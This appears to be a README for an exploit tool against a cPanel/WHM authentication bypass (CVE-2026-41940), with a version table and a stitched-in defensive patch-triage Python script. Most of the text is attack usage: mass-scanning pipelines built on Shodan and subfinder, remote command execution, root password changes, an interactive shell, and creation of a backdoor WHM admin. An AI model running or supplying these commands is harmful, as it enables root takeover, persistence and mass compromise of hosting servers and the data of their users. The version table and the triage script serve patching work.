⚠ This tool is created solely for educational or bug bounty purpose only. Unauthorized use outside of controlled environments is strictly prohibited.

Description

A tool for exploiting CVE-2026-41940, a critical authentication bypass in cPanel & WHM (CVSS 10.0), allowing unauthenticated attackers to gain root-level WHM access by injecting CRLF sequences into server-side session files via the Authorization header — no credentials required.

How it works

CVE-2026-41940 is exploited through a breakdown in how cPanel/WHM handles authentication sessions. The attack typically begins with a normal request to the login interface, where the application initializes a session before it has fully validated the user's credentials. Because session-related input is handled improperly, crafted or unexpected input structures can alter how the server stores or interprets session data.

Affected versions

Version   Vulnerable        Patched
110.x     ≤ 11.110.0.96     11.110.0.97
118.x     ≤ 11.118.0.62     11.118.0.63
126.x     ≤ 11.126.0.53     11.126.0.54
132.x     ≤ 11.132.0.28     11.132.0.29
134.x     ≤ 11.134.0.19     11.134.0.20
136.x     ≤ 11.136.0.4      11.136.0.5
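
For defenders, the table above works as a patch-triage check over a server inventory. The following is an added example, not part of the tool or the original page; the short version form without the leading "11." and the sample host names are assumptions.

```python
import re

# First patched build per branch, copied from the "Affected versions" table.
PATCHED = {
    110: (11, 110, 0, 97),
    118: (11, 118, 0, 63),
    126: (11, 126, 0, 54),
    132: (11, 132, 0, 29),
    134: (11, 134, 0, 20),
    136: (11, 136, 0, 5),
}

_VERSION_RE = re.compile(r"^(?:11\.)?(\d{2,3})\.(\d+)\.(\d+)$")

def parse_version(text):
    """Return (11, branch, minor, build), or None if the string does not parse.

    Accepts '11.126.0.53' and, as an assumption, the short form '126.0.53'.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        return None
    branch, minor, build = (int(g) for g in m.groups())
    return (11, branch, minor, build)

def classify(text):
    """Return 'vulnerable', 'patched', 'unlisted' or 'invalid' for one version."""
    version = parse_version(text)
    if version is None:
        return "invalid"
    fixed = PATCHED.get(version[1])
    if fixed is None:
        return "unlisted"  # branch not in the table: the page makes no claim
    return "patched" if version >= fixed else "vulnerable"

def triage(inventory):
    """Group {host: version string} into {status: [hosts]} for patch planning."""
    report = {}
    for host, version in sorted(inventory.items()):
        report.setdefault(classify(version), []).append(host)
    return report

if __name__ == "__main__":
    # Constructed inventory: host names and versions are sample data.
    sample = {"whm-a.example": "11.126.0.53", "whm-b.example": "136.0.5",
              "whm-c.example": "11.130.0.7", "whm-d.example": "unknown"}
    for status, hosts in triage(sample).items():
        print(f"{status}: {', '.join(hosts)}")
```

Hosts reported as "unlisted" or "invalid" need a manual check, since the table only covers the six branches shown.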

Installation (Windows/Mac OS)

git clone https://github.com/olofsatte/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
python3 exp.py

How to use

The tool expects a target domain to be specified.

Single target mode:

python exp.py -u https://target1.com:2083

You can also scan targets listed in a target.txt file (create it first):

python exp.py -l target.txt -t 50 -o result.json

Basic scan and other available commands:

python3 exp.py -u https://victim1.com:2083 # single target scan
python3 exp.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python3 exp.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.

Post-Exploit actions

# List all accounts on the server
python3 exp.py list -u https://target.com:2087

# OS command
python3 exp.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python3 exp.py cmd -u https://target.com:2087 --cmd "ls /home"

# Get server info (hostname, disk, MySQL host)
python3 exp.py info -u https://target.com:2087

# Change root password
python3 exp.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Interactive WHM shell
python3 exp.py shell -u https://target.com:2087

Pipelines

# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python3 exp.py scan -t 40 -o results.json

# From scope list
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python3 exp.py scan -t 30 -o results.json

# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python3 exp.py -t 30 -o shodan_results.json

# Multiple sources combined
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python3 exp.py -t 20 --action list

WHM Shell mode

After a successful execution, you can open an interactive WHM shell:

python3 exp.py shell -u

All shell Commands

Command                  Description
id                       Show User ID
hostname                 Get server hostname
accounts                 List all user accounts
info                     Load, disk, MySQL host, version
cat <path>               Read file content
exec <cmd>               Execute OS command
newadmin <user> <pass>   Create backdoor WHM admin
passwd <pass>            Change root password
l [path]                 List directory
help                     Show all commands
exit                     Exit shell mode

CLI Reference

usage: exp.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT]

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors
